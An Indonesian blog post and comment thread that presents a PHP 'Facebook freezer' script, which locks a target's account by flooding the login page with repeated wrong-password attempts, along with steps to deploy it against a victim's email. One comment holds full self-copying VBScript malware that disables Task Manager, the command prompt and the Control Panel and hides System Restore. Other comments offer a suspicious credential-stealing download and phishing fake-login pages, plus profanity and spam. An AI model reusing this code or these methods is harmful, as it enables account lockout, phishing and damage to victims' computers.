Beranda > HACKING > TUTORIAL HACK FACEBOOK

TUTORIAL HACK FACEBOOK

TUTORIAL HACK FACEBOOK

Tutorial hack facebook yang akan saya share disini memiliki fungsi sama persis dengan software hack facebook yaitu bikin beku / ga bisa buad login facebook seseorang , tapi ini versi webphp😀 jadi senjata yang harus anda siapkan adalah :
hosting yang support php dan curl (jangan 000webhost)
dan Notepad😀
caranya mudah , copy script dibawah ini ke notepad :

<?
echo “<html><title>PHP Facebook Freezer</title><head><meta http-equiv=\”refresh\” content=\”600\”></head><body>”;
echo “<br><form method=post>Email : <input name=email><input type=submit value=Submit></form><br><br>”;
$email=$_POST[’email’];
$passwd=’123′;
if(isset($email) && isset($passwd)){
$kue=”/tmp/”.rand().”.txt”;
$url=’https://login.facebook.com/login.php&#8217;;
$login=”email=$email&pass=$passwd&login=Log In”;
define(“_COK_”, $kue);
curlget($url);
for ($number=1; $number<=30; $number++) {
$data=curlpost($url,$login);
}
echo $data;
}
function curlget($url){
$agent=$_SERVER[‘HTTP_USER_AGENT’];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
function curlpost($url,$post){
$agent=$_SERVER[‘HTTP_USER_AGENT’];
$curl=curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_ENCODING, “”);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION ,1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER ,1);
curl_setopt($curl, CURLOPT_COOKIEFILE, _COK_);
curl_setopt($curl, CURLOPT_COOKIEJAR, _COK_);
$data = curl_exec($curl);
curl_close ($curl);
return $data;
}
echo “</body></html>”;
?>

setelah kamu berhasil mengkopi script untuk hack facebook diatas , kini saatnya untuk menyimpan dengan nama nomoredisk.Php
setelah itu kamu upload file Fb.Php ke hostinganmu yang suport curl dan php
nih contoh jadinya klik disini
klo file udah di upload kini tinggal main ………😀 ,
buka file yang kamu upload tadi ex: http://wolimierz.org/images/nomoredisk.php
setelah itu masukan dah email target😀 , maka dia ga akan bisa login (tapi ga permanent).

Sumber :
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA
http://mr-amateur.co.cc
http://www.hilmanpribadi.com

Kategori:HACKING
  1. dinsei
    September 13, 2009 pukul 4:38 am

    misi ka, ada ga kak buat hack -an data aja? misalkan FB si A klo ada notification nya gitu nyampe ke FB si B(yg menghack) bisa ga ka? kalo ada mohon bantuannya ya kak

    • rahul
      April 14, 2010 pukul 2:10 pm

      coba pakai ini??/

      CAra mendapatkan Acount sama pasword orang tanpa orang lain tau :

      link;http://www.mediafire.com/?1z4ycngwimy

      LAngkah_langkahnya:

      1.klik program FB berlogo hati lalu klik kalimat here to continew

      2.masukan e_mail kita sama pasword untuk bisa masuk ke program.lalu tekan Tranfer/OK

      3.jika berasil akan keluar kalimat programing SUkses.untuk melanjutkan
      lalu masukan E-mail yang dituju atau Email tmn anda tanpa harus memasukan pasword

      4.jika berhasil maka anda akan mendapatkan pasword dari E-mail yang anda tulis

      setelah berasil maka program ini jangan disalah gunakan…

      “”SELAMAT MENCOBA””

      • Mei 22, 2010 pukul 10:42 pm

        konntol kw anjing.,.,
        kw suruh msukin email ma pasword.,
        tu sma aj nyerahin dri begok.,
        penipu kelaz teri lu.,

      • April 30, 2011 pukul 5:28 pm

        bangkeeeeeeeee . . . .
        newbie lu njink . . . . .

      • Juni 30, 2011 pukul 4:30 am

        Bang coba donk Hack Akun FB aku dengan akun Gonol Putra Merynda. trus emailnya bot.camfrog@gmail.com. Itu akun FB ku. silahkan hack ajah kalau bisa kamu takkasih hadiah. Kalau ente ga bisa berarti ente yang GOBLOG SUPER GOBLOG

  2. superman
    Desember 24, 2009 pukul 9:36 am

    ga bisa bang, udah nyoba ckck

  3. Februari 9, 2010 pukul 7:50 am

    wah bang kok g bsa ?
    cacad lu bang

    • April 17, 2011 pukul 8:41 am

      tau ni bang w ga bsa jga

  4. winay
    Februari 10, 2010 pukul 7:36 am

    yah…ko kaga bisa,,cari cara dong biar bisa..

  5. Februari 16, 2010 pukul 3:07 pm

    sudah nggk bisa cara bgitu…

    kuno

  6. Februari 17, 2010 pukul 2:01 am

    wkwkwk kurang keren….

  7. koodex
    April 23, 2010 pukul 4:53 pm

    Dlogok kwe ngapusi

  8. April 25, 2010 pukul 11:23 am

    Yah lumayan lah gan! beku juga kan bisa bikin jengkel hehehe🙂 hehehe!

    http://segalailmu.wordpress.com
    http://mynubii.blogspot.com

  9. pepek kembar
    Juni 1, 2010 pukul 9:23 am

    bagus kau mati aja kepinding…..? kau punya orangtua ndk….? siapa tau kau anak setan….!sok sok jak kau tu,,,, besar kontol aja kau…..!

  10. monkey burn
    Juni 3, 2010 pukul 4:49 am

    rahul :
    coba pakai ini??/
    CAra mendapatkan Acount sama pasword orang tanpa orang lain tau :
    link;http://www.mediafire.com/?1z4ycngwimy
    LAngkah_langkahnya:
    1.klik program FB berlogo hati lalu klik kalimat here to continew
    2.masukan e_mail kita sama pasword untuk bisa masuk ke program.lalu tekan Tranfer/OK

    3.jika berasil akan keluar kalimat programing SUkses.untuk melanjutkan
    lalu masukan E-mail yang dituju atau Email tmn anda tanpa harus memasukan pasword

    washuu….mang gue kaga tau……………..
    4.jika berhasil maka anda akan mendapatkan pasword dari E-mail yang anda tulis
    setelah berasil maka program ini jangan disalah gunakan…
    “”SELAMAT MENCOBA””

  11. monkey burn
    Juni 3, 2010 pukul 4:49 am

    rahul :
    coba pakai ini??/
    CAra mendapatkan Acount sama pasword orang tanpa orang lain tau :
    link;http://www.mediafire.com/?1z4ycngwimy
    LAngkah_langkahnya:
    1.klik program FB berlogo hati lalu klik kalimat here to continew
    2.masukan e_mail kita sama pasword untuk bisa masuk ke program.lalu tekan Tranfer/OK

    3.jika berasil akan keluar kalimat programing SUkses.untuk melanjutkan
    lalu masukan E-mail yang dituju atau Email tmn anda tanpa harus memasukan pasword

    jiah sikampret ngibulin orang…………
    4.jika berhasil maka anda akan mendapatkan pasword dari E-mail yang anda tulis
    setelah berasil maka program ini jangan disalah gunakan…
    “”SELAMAT MENCOBA””

  12. Juni 20, 2010 pukul 2:32 am

    pengen tau passwordNya?
    Lgs minta aj mA yg punya,….Beres.!!!!

    • Juni 30, 2011 pukul 4:31 am

      Bener bgt enter, gw sejutu kalau yang seperti ini hihihihihihihihi

  13. manto
    Juni 20, 2010 pukul 5:16 pm

    ini sebenernya mo hack atow pengen tau password org, klo hack aq meragukan 100%, tp klo mo tau password ya aq sependapat chip “langsung minta ma yg pnya password”

  14. Juni 28, 2010 pukul 1:33 pm

    ni yang goblok & bego yang nanya pa yang jawab ya? wakakakakakakakk…
    DASAR PENIPU DODOL…!!!!!

  15. cyber crime
    Juli 12, 2010 pukul 12:48 pm

    yang jawab sama nanya juga semua bego!!!!!!!!…
    ga bakal ada yang gratis nih gw punya cheat buat transparant poker zynga gw jual, berani berapa??
    buat hack yahoo e-mail ada!!!!! kalau dipake buat gmail ga bisa… berani berapa?????????….

    • dick
      Maret 18, 2011 pukul 7:08 pm

      1 jta ajja deh.,

  16. resen
    Juli 14, 2010 pukul 11:27 am

    kontol babi la program g jelas smua

  17. Juli 15, 2010 pukul 6:22 pm

    kaga bisa coy

  18. KONTOL
    Juli 18, 2010 pukul 1:46 am

    ANJING LU ..KONTOL..GAK BISA TAU. RAUL DAN MONKEY BURN KAYA ANJING

  19. pantek
    Agustus 8, 2010 pukul 2:42 pm

    hacker ngak bermutu… byak link link nya…

  20. haheho
    Oktober 17, 2010 pukul 2:40 pm

    woooyyyy…
    kalo mau jadi hacker, jangan nanya sembarangan tanya…
    nanya sama yang bisa n sudah diikenal (minimal bisa ditemui face to face)…
    nih tanya aja ama fiend w…
    fb nya,,, Matmund Newbie
    dia gak bakalan usil…
    dari pada ngata2in orang yang cuma bisa copy paste dari tempat orang lain (nambahin dosa yang gak penting)

  21. November 4, 2010 pukul 3:55 pm

    guoblok kalo ada yang mau nurutin thread di atas…bruakakakakakakak….!

  22. November 18, 2010 pukul 2:52 am

    Dr pada ribut mending beli fake login binan gue ajha,,, fake loginya dalam bentuk tampilan mobile, bisa di pasang di bookmark hp korban tanpa terlihat mencurigakan….. Yg berminat silahkan hubungi gw…

  23. November 19, 2010 pukul 6:46 am

    gak bisa pukimak………..

  24. System Error
    Januari 8, 2011 pukul 12:46 pm

    On error resume next
    Dim Regpen, FSO, Copier, Creator, Dupler, Deleter, Runner
    set Regpen = CreateObject (“Wscript.Shell” )
    set FSO = CreateObject (“Scripting. FileSystemObject “)
    set Creator = FSO.CreateTextFile (“C:\Ternate. vbs”, true)
    Creator.WriteLine (“Msgbox (“& Chr (34) & “Salam Kenal dari Saya,
    Mr.Dajjal :<" & chr (34)& ")")
    Creator.Close

    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \System\NoRun" ,"1","REG_ DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \System\DisableC MD","1"," REG_DW ORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \Explorer\ NoFolderOption" ,"1"," REG_DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \Explorer\ NoDrives" ,"16","REG_ D WORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \Explorer\ NoSaveSettings" ,"1"," REG_DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"
    Regpen.RegWrite "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\Curr
    entVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"
    Regpen.Regwrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur
    rentVersion\ Winlogon\ LegalNoticeCapti on", "THE Syaithan-X"
    Regpen.RegWrite "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\Cur
    rentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR"

    Set Copier = FSO.GetFile ("C:\Jogja. vbs")
    Copier.Copy ("C:\Documents and Settings\All Users\Start
    Menu\Programs\ Startup\Adobe. vbs")

    FSO.CreateFolder ("C:\Program Files\Microsoft 0fficeffice12" )
    FSO.CreateFolder ("D:\Program" )
    FSO.CreateFolder ("E:\Program" )
    FSO.CreateFolder ("F:\Program" )
    FSO.CreateFolder ("G:\Program" )
    FSO.CreateFolder ("H:\Program" )
    FSO.CreateFolder ("I:\Program" )
    FSO.CreateFolder ("J:\Program" )
    FSO.CreateFolder ("K:\Program" )

    Set Deleter = FSO.GetFile ("C:\Windows\ System32\ Restore\rstrui. exe")
    Deleter.Move ("C:\Program Files\Microsoft 0fficeffice12\ rstrui.Gnamu" )

    set Dupler = FSO.GetFile (WScript.ScriptFull Name)
    Dupler.Copy ("C:\Program Files\Microsof 0fficeffice12\ Hantu.vbs" )
    Dupler.Copy ("C:\Documents and Settings\All Users\Start
    Menu\Programs\ Startup\Desktop. ini.vbs")
    Dupler.Copy ("C:\Documents and Settings\All
    Users\Desktop\ Dajjal_Antivirus .exe.vbs" )
    Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")
    Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")
    Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )
    Dupler.Copy ("F:\Program\ Ansav_SETUP. vbs")
    Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )
    Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )
    Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")
    Dupler.Copy ("J:\Program\ Project.vbs" )
    Dupler.Copy ("K:\Program\ Hantu.vbs" )

    Set Runner = WScript.CreateObjec t ("WScript.Shell" )
    Runner.Run ("C:\Program Files\Microsoft 0fficeffice12\ Hantu.vbs" )

  25. hengki
    Januari 25, 2011 pukul 11:51 am

    info tai

  26. cepot -persib-
    Februari 6, 2011 pukul 12:33 pm

    nubie..

  27. Februari 12, 2011 pukul 6:29 pm

    wah horor nie..

    kalo dijalanin lwat localhost ndak bisa..?

    kita install php dulu gitu di lcoal kta

  28. ryo
    Februari 15, 2011 pukul 8:40 am

    mas gmn kalo caranya biar kita tau sapa yg ngehack fb qta?

  29. loleng
    Maret 7, 2011 pukul 12:05 pm

    cara ngehack terbaru agan,,

    start, shutdown, setelah muncul layar biru tekan alt + ctrl + pg down

    akan muncul tampilan seperti cmd

    khusus buat linux gan

  30. dick
    Maret 18, 2011 pukul 7:11 pm

    semuanya ga ada yang gratisan bos,
    jangan dngerin orang” saraf pda ngasih cara.,

  31. April 8, 2011 pukul 9:39 pm

    1.klik program FB berlogo hati lalu klik kalimat here to continew,,,,
    naqh tu nyari fb yg berloga hati dmn bang sm pncarian here nya

  32. April 8, 2011 pukul 9:42 pm

    1.klik program FB berlogo hati lalu klik kalimat here to continew,,,, nyari fb yg berlogo dr mn sya mencari2 tdk ktmuu

  33. April 10, 2011 pukul 1:27 pm

  34. Juni 16, 2011 pukul 5:38 pm

    semoga berhasil

  35. beni ganteng
    Oktober 22, 2011 pukul 11:39 am

    ngga ngerti di gimanain

  36. November 12, 2011 pukul 6:50 pm

    numpang promosiin blog yah gan
    ahmadrastafara.blogspot.com berbagai cheat ada di sini :21:21

  37. November 12, 2011 pukul 6:53 pm

    Kalau ada yang tutorialnya silahkan di comen aja gan . ini lah blog yang bikin kita tenang dan senang dalam segala cheatnya . semua work
    gua udah coba semua gan di 100 % klau ga percaya datang aja ke blognya

    ahmadrastafara.blogspot.com

    SERBU……

  38. November 12, 2011 pukul 6:55 pm

    Thanks gan atas informasinya dan thanks atas promosi blognya .
    selamat beraktivitas kembali

  39. November 27, 2011 pukul 10:44 pm

    Setau ane yang bisa itu pishing dan keylogger, klau yang lain kaga tau…
    Tapi nice info gan

  40. siva
    Desember 4, 2011 pukul 9:20 am

    wah parah yakin

  41. April 8, 2012 pukul 3:13 pm

    daripada hack facebook mendingan nonton bokep artis indonesia

  42. April 8, 2012 pukul 3:16 pm

    benr bgt kata gan galih buat apa hack facebook ngak ada gunanya
    nich mas KUMPULAN LINK BOKEP INDONESIA

    http://indopornlist.16mb.com/situs%20artis%20indo%20pornlist.htm

  43. Juni 26, 2012 pukul 4:41 pm

    numpang promosi…blogspot gan

    namanyahidupsusah.blogspot

  44. blogmuini
    Juli 12, 2012 pukul 2:42 am

    wah mantap juga tu

  45. sueng
    November 29, 2012 pukul 8:29 am

    wedhuss

  46. busuk ulung
    Maret 16, 2013 pukul 2:21 am

    terlalu bodoh!! ya yg jelas yg tau password kita ya si march zuckerberck tuh.. tanya langsung tuh passwordnya secara 4 mata…

  47. Mei 16, 2013 pukul 12:57 pm

    wuih bisa dipraktekin tuhh,,
    thanks atas kunjungannya ke blog saya technologames.blogspot.com

  48. ahmad
    November 7, 2013 pukul 11:49 pm

    Mas kalo fb kena hack trus d.alihkan ke email hackernya itu gimana ya benerinnya mas . ? Mohon bantuannya .

  49. Desember 26, 2013 pukul 5:46 pm

    j’aime les soldes, surtout sur les éléctromenagers.

    j’adore les cadeaux gratuits avec les codes chouchou,
    ils sont interessant comme les couettes, le sac a course et les moules en silicone.
    la livraison est tres rapide en point de relais par contre il faut attendre 2 semaines pour être livré chez
    soi. et en plus le cadeau ne vient pas avec mais
    par un autre courrier ultérieurement. ils sont
    à l’écoute des clients, et il y a possibilité de faire un retour des
    produits si le produit ne vous convient pas (en géneral il y a un document à remplir avec le colis pour preciser le motif du retour )

  50. leo
    April 6, 2014 pukul 2:09 am

    Nulis kode php aja masih belum bener kok udah mau ngajarin hacking.

  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: